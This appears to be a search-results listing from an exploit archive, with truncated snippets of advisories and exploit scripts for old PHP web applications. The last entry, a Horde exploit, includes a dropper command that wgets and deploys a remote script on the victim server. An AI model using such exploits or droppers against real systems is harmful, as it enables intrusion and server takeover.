7220 matches found
mooSocial 1.3 - Multiple Vulnerabilites
No description provided by source. Exploit Title: mooSocial 1.3 - Multiple Vulnerabilites Official site: http://www.moosocial.com Risk Level: High Exploit Author: Esac Homepage author : www.iss4m.ma Last Checked: 22/08/2013 +----------+ | OVERVIEW | +----------+ mooSocial is a social networking...
@lex Guestbook <= 4.0.2 - Remote Command Execution Exploit
No description provided by source. !/usr/bin/php ?php // | | header @lex Guestbook = 4.0.2 Remote Command Execution Exploit | header ======================================================== | status Retrieving the administrator password | sploit AdminUsername::root | sploit AdminPassword::toor |...
Active Collab "chat module" <= 2.3.8 - Remote PHP Code Injection Exploit
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...
CuteNews <= 1.4.1 (categories.mdu) Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl cijfer-cnxpl - CuteNews =1.4.1 Remote Command Execution Copyright c 2005 cijfer [email protected] All rights reserved. 1. example cijfer@kalma:/research$ ./cijfer-cnxpl.pl -h www.xxxx.org -d /news [email protected] /$ id;uname -a uid=48apache...
Premod SubDog 2 includes/themen_portal_mitte.php phpbb_root_path Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/22912/info Premod SubDog 2 is prone to multiple remote file-include vulnerabilities. An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of...
wordpress <= 3.3.1 - Multiple Vulnerabilities
No description provided by source. Trustwave's SpiderLabs Security Advisory TWSL2012-002: Multiple Vulnerabilities in WordPress https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt Published: 1/24/12 Version: 1.0 Vendor: WordPress http://wordpress.org/ Product: WordPress Version...
NOCC 1.0 filter_prefs.php html_filter_select Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/16793/info NOCC Webmail is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issues to inject...
HiveMail 1.2.2/1.3 folders.update.php folderid Variable Arbitrary PHP Command Execution
No description provided by source. source: http://www.securityfocus.com/bid/16591/info HiveMail is prone to multiple vulnerabilities. These vulnerabilities may allow the execution of arbitrary PHP code, cross-site scripting attacks, and SQL injection. The PHP code-execution issues are the result ...
AlstraSoft Template Seller Pro <= 3.25 Admin Password Change Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo AlstraSoft Template Seller Pro = 3.25 Admin Password Change Exploit by BlackHawk [email protected] http://itablackhawk.altervista.org Thanks to rgod for the php code and Marty for the Love ; if $argc4 echo Usage: php...
mcGalleryPRO <= 2006 (path_to_folder) Remote Include Vulnerability
No description provided by source. SolpotCrew Community Mcgallerypro pathtofolder Remote File Inclusion Download file : http://phpforums.net/mcgp/mcgp.zip/mcgp.zip Bug Found By :Solpot a.k.a k. Hasibuan 10-09-2006 contact: [email protected] Website :...
Joomla Component com_jfuploader < 2.12 Remote File Upload
No description provided by source. ========================================================================================================= Type : Joomla Component comjfuploader 2.12 Remote File Upload Author : Setr0nix Home : www.Setr0nix.com Contact : [email protected]...
PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit
No description provided by source. ?php / ------------------------------------------------------------------------ PhpWebGallery = 1.7.2 Remote Session Hijacking / Code Execution Exploit ------------------------------------------------------------------------ author...: EgiX mail.....:...
Simploo CMS 1.7.1 PHP Code Execution
No description provided by source. Simploo CMS Community Edition - Remote PHP Code Execution Issue Details ============= Product: Simploo CMS Community Edition Security-Risk: moderated Remote-Exploit: yes Vendor-URL: http://www.simploo.de/ Advisory-Status: published Credits ============= Discover...
HiveMail 1.2.2/1.3 index.php $_SERVER['PHP_SELF'] XSS
No description provided by source. source: http://www.securityfocus.com/bid/16591/info HiveMail is prone to multiple vulnerabilities. These vulnerabilities may allow the execution of arbitrary PHP code, cross-site scripting attacks, and SQL injection. The PHP code-execution issues are the result ...
otalCalendar 0 about.php inc_dir Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/17618/info TotalCalendar is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issues to...
PHPSavant Savant2 stylesheet.php mosConfig_absolute_path Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/19151/info Savant2 is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these issues to include arbitrary remote files containing...
ModuleBased CMS Multiple Remote File Include Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/19754/info ModuleBased CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these issues to include an arbitrary remote file...
DataLife Engine preview.php PHP Code Injection
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...
TextPattern <= 1.19 (publish.php) Remote File Inclusion Vulnerability
No description provided by source. ---------------------------------------------------------------------------- TextPattern =g1.19 txpcfgtxpath Remote File Inclusion Vulnerability ---------------------------------------------------------------------------- Author : Zeni Susanto A.K.A Bithedz Date...
Horde Framework Unserialize PHP Code Execution
ported from metasploit by irrlicht june 2014 modify dropper url and run use strict; use warnings; use LWP::UserAgent; use WWW::Mechanize; use MIME::Base64; if !$ARGV0 print "specify full login.php url\n"; exit; my $dropper = 'system"mkdir /tmp/\" \"; cd /tmp/\" \"; wget -O deploy.pl...